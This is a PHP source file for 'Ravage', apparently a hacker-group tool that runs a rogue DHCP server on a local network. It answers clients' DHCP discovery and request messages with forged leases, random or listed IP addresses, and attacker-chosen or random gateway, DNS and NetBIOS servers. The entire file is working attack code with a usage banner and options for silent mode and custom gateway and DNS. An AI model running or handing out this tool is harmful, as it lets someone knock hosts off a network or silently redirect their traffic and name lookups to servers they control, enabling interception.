<?php
/* 
* File: Ravage.php 
* Version: 1.0 
* Author: Nima Ghotbi 
* Copyright: 2010 h.ackerz 
* Date: 09/03/2010 
* Link: http://h.ackerz.com 
*  
* This program is free software; you can redistribute it and/or  
* modify it under the terms of the GNU General Public License  
* as published by the Free Software Foundation; either version 2  
* of the License, or (at your option) any later version. 
*  
* This program is distributed in the hope that it will be useful,  
* but WITHOUT ANY WARRANTY; without even the implied warranty of  
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  
* GNU General Public License for more details:  
* http://www.gnu.org/licenses/gpl.html 
* 
*/ 

set_time_limit (0);

if(count($argv)<2)Usage();
if(array_search("-h",$argv))Usage();

$ServerIP=$argv[1];
$Fromfile=false;
$IPList=array();
$Num=-1;
$Output=(array_search("-s",$argv))?false:true;
if($Index=array_search("-l",$argv)){
	$Fromfile=true;
	$IPList=file($argv[$Index+1]);
}
$DNSIP=($Index=array_search("-d",$argv))?inet_pton($argv[$Index+1]):false;
$GWIP=($Index=array_search("-g",$argv))?inet_pton($argv[$Index+1]):false;
$socket = socket_create(AF_INET,SOCK_DGRAM, SOL_UDP); 
socket_set_option($socket, SOL_SOCKET, SO_BROADCAST, 1);
socket_set_block($socket);
        if (socket_bind($socket, "0.0.0.0", "67") == false)die("Error on bindinig!");
		if($Output)echo "\n[Ravage DHCP server has been started]\n";
        while(1) 
        { 
        	$buf = socket_read($socket, 4608);
			if ($buf){
				if($Output)echo "<-----Recived:";
				$Res=Analyze($buf);
				if ($Res) {		
					$Packet=implode('',$Res);
					if (socket_sendto($socket,$Packet, strlen($Packet), 0,"255.255.255.255", 68) === false)
					{
						if($Output)echo "Error on sending packet...\n";
					}
				}
			}
		}
socket_set_nonblock($sock);
socket_close($sock);

function Analyze($InpPack){
global $ServerIP,$IP,$Output,$DNSIP,$GWIP;
$sIP=inet_pton($ServerIP);
$Request['Op']=substr($InpPack,0,1);
$Request['HType']=substr($InpPack,1,1);
$Request['HLen']=substr($InpPack,2,1);
$Request['Hops']=substr($InpPack,3,1);
$Request['XID']=substr($InpPack,4,4);
$Request['Secs']=substr($InpPack,8,2);
$Request['Flags']=substr($InpPack,10,2);
$Request['CIAddr']=substr($InpPack,12,4);
$Request['YIAddr']=substr($InpPack,16,4);
$Request['SIAddr']=substr($InpPack,20,4);
$Request['GIAddr']=substr($InpPack,24,4);
$Request['CHAddr']=substr($InpPack,28,16);
$Request['SName']=substr($InpPack,44,64);
$Request['File']=substr($InpPack,108,128);
$Request['Magic']=substr($InpPack,236,4);
$Request['Options']=substr($InpPack,240);

$Offer['Op']="\x02";
$Offer['HType']="\x01";
$Offer['HLen']="\x06";
$Offer['Hops']="\x00";
$Offer['XID']=$Request['XID'];
$Offer['Secs']="\x00\x00";
$Offer['Flags']="\x00\x00";
$Offer['CIAddr']="\x00\x00\x00\x00";
$Offer['YIAddr']="";
$Offer['SIAddr']=$sIP;
$Offer['GIAddr']="\x00\x00\x00\x00";
$Offer['CHAddr']=$Request['CHAddr'];
$Offer['SName']=str_repeat("\x00",64);
$Offer['File']=str_repeat("\x00",128);
$Offer['Magic']="\x63\x82\x53\x63";
$Offer['Options']="\x35\x01";
$NBoTCP=RandomIP();
$DNS=($DNSIP)?$DNSIP:RandomIP();
$Options=GetOption($Request['Options']);
$MessageTypeIndex=array_search("53",$Options[0]);
$HostNameIndex=array_search("12",$Options[0]);
$HostName=substr($Options[2][$HostNameIndex],0,$Options[1][$HostNameIndex]);
$ClassIDIndex=array_search("60",$Options[0]);
$ClassID=substr($Options[2][$ClassIDIndex],0,$Options[1][$ClassIDIndex]);
$MessageTypeCode=ord($Options[2][$MessageTypeIndex]);
if($rIPIndex=array_search("50",$Options[0]))$rIP=ord($Options[2][$rIPIndex]{0}).".".ord($Options[2][$rIPIndex]{1}).".".ord($Options[2][$rIPIndex]{2}).".".ord($Options[2][$rIPIndex]{3});

switch ($MessageTypeCode){
	case 1:
		if($Output)echo "\t[Discovery] from $HostName\nIP: ". inet_ntop($Request['CIAddr']). "\tMAC: " .ShowMAC($Request['CHAddr'])."\t ClassID: $ClassID\n";
		$IP=GenerateIP();
		$GW=($GWIP)?$GWIP:CalculateGW($IP);
		$Offer['YIAddr']=$IP;
		$Offer['Options'].="\x02";
		echo "----->Sending offer\nIP: ".inet_ntop($IP). "\tGW: ".inet_ntop($GW). "\nDNS: ".inet_ntop($DNS). "\tNB:".inet_ntop($NBoTCP)."\n"; 
		break;
	case 2:
		if($Output)echo "\t[Release] from $HostName\nIP: ". inet_ntop($Request['CIAddr']). "\tMAC: " .ShowMAC($Request['CHAddr'])."\t ClassID: $ClassID\n";
		break;
	case 3:
		$TMP=inet_pton($rIP);
		$Offer['YIAddr']=$TMP;
		$GW=CalculateGW($TMP);
		if($Output)echo "\t[Request] for $rIP from $HostName\nIP: ". inet_ntop($Request['CIAddr']). "\tMAC: " .ShowMAC($Request['CHAddr'])."\t ClassID: $ClassID\n";
		if($Output)echo "----->Sending acknowledgment\n";
		$Offer['Options'].="\x05";
		break;
	case 8:
		if($Output)echo "\t[Inform] from $HostName\nIP: ". inet_ntop($Request['CIAddr']). "\tMAC: " .ShowMAC($Request['CHAddr'])."\t ClassID: $ClassID\n";
		return array();
		break;
	default:
		if($Output)echo "\t[Unknown Message type! ($MessageTypeCode)]\n";
		return array();
	break;
}
$Offer['Options'].="\x01\x04\xff\xff\xff\x00\x3a\x04\x00\x05\x46\x00\x3b\x04\x00\x09\x3a\x80\x33\x04\x00\x0a\x8c\x00\x36\x04$sIP\x03\x04$GW\x06\x04$DNS\x2c\x04$NBoTCP\x2e\x01\x08\xff".str_repeat("\x00",5);
return $Offer;
}
function GetOption($RawOptions){
	for($i=1;$i<strlen($RawOptions);$i+=2){
		$tmp1=ord($RawOptions{$i});
		$tmp2=ord($RawOptions{$i-1});
		if($tmp2==0)break;
		$Size[]=$tmp1;
		$Code[]=$tmp2;
		$j=$i;
		$i+=$tmp1;
		$Value[]=substr($RawOptions,$j+1,$i-1);
	}
	return array($Code,$Size,$Value);
}
function ShowMAC($CHAddr){
	$Ret='';
	for($i=0;$i<6;$i++){
		$TMP=dechex(ord($CHAddr{$i}));
		$Ret.=(strlen($TMP)==1)?"0$TMP":$TMP;
		$Ret.=':';
	}
	$Ret=substr($Ret,0,strlen($Ret)-1);
	return $Ret;
}
function GenerateIP(){
	global $Fromfile,$IPList,$Num;
	if($Fromfile){
		$Num++;
		if($Num==count($IPList))die("\nAll IPs has been offered.\n");
		return inet_pton(trim($IPList[$Num]));
	}
	return RandomIP();
}
function RandomIP(){
	return inet_pton(rand(1,255).'.'.rand(0,255).'.'.rand(0,255).'.'.rand(2,254));
}
function CalculateGW($IP){
	return substr($IP,0,3)."\x01";
}
function Usage(){
	die(
"
Ravage v1.0 [http://h.ackerz.com]

Usage:

	#ravage.php source_ip [-h][-s][-l file][-g GW_ip][-d DNS_ip]

	-h	Show usage
	-s	Silent mode
	-l	Offer IPs from a list(By default Ravage generates random IPs)
	-g	Set gateway IP(By default Ravage offers x.x.x.1 as gateway)
	-d	Set DNS IP(By default Ravage picks random DNS for each request)

"
);
}
?>
